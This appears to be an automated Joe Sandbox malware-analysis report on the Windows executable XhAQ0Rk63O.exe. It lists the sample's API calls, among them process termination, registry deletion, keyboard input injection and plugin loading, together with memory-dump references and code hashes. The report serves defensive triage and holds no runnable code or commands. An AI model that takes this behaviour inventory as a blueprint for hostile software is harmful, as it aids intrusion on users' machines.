                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3495660284-0
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\XhAQ0Rk63O.exe,00000004), ref: 00436055
                                                                                          • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                          • GetLastError.KERNEL32 ref: 00436081
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 1690418490-0
                                                                                          APIs
                                                                                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                          • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                          • CoUninitialize.OLE32 ref: 00475D71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                          • String ID: .lnk$HH
                                                                                          • API String ID: 886957087-3121654589
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$InfoItem_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1173514356-4108050209
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                          • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: AU3_GetPluginDetails$Wu
                                                                                          • API String ID: 145871493-136108093
                                                                                          • Opcode ID: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
                                                                                          • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                          • Opcode Fuzzy Hash: e60d032cda8e07fae4321829b238a90b33a1110472f30aca6681d3aeba7a8f27
                                                                                          • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 763830540-1403004172
                                                                                          • Opcode ID: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
                                                                                          • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                          • Opcode Fuzzy Hash: 169cb05da2f7371639be8c7bcea77e944b24e4bfad061a6cd0ac94a92c737455
                                                                                          • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75572EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentHandleProcess$Duplicate
                                                                                          • String ID: nul
                                                                                          • API String ID: 2124370227-2873401336
                                                                                          • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                          • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                          • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                          • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75572EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                            • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                            • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentHandleProcess$Duplicate
                                                                                          • String ID: nul
                                                                                          • API String ID: 2124370227-2873401336
                                                                                          • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                          • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                                          • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                                          • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                          • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                          • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 3529120543-1011021900
                                                                                          • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                          • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                                          • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                                          • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                                          APIs
                                                                                          • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                          • TranslateMessage.USER32(?), ref: 0044308B
                                                                                          • DispatchMessageW.USER32(?), ref: 00443096
                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1795658109-438819550
                                                                                          • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                          • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                          • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                          • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                          APIs
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                            • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                            • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                            • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                            • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                          • GetFocus.USER32 ref: 004609EF
                                                                                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                            • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                          • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                          • __swprintf.LIBCMT ref: 00460A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                          • String ID: %s%d
                                                                                          • API String ID: 991886796-1110647743
                                                                                          • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                          • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                          • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                          • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memset$_sprintf
                                                                                          • String ID: %02X
                                                                                          • API String ID: 891462717-436463671
                                                                                          • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                          • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                          • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                          • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0042CD00
                                                                                          • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                            • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                            • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                            • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                            • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                            • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                           • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                           • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                          • String ID: $OH$@OH$X
                                                                                          • API String ID: 3491138722-1394974532
                                                                                          • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                          • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                          • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                          • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                          APIs
                                                                                          • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                          • SendInput.USER32 ref: 0044C509
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardMessagePostState$InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 3031425849-0
                                                                                          • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                          • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                          • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                          • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                          • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Enum$CloseDeleteOpen
                                                                                          • String ID:
                                                                                          • API String ID: 2095303065-0
                                                                                          • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                          • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                          • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                          • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                          APIs
                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                          • String ID:
                                                                                          • API String ID: 2832842796-0
                                                                                          • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                          • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                          • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
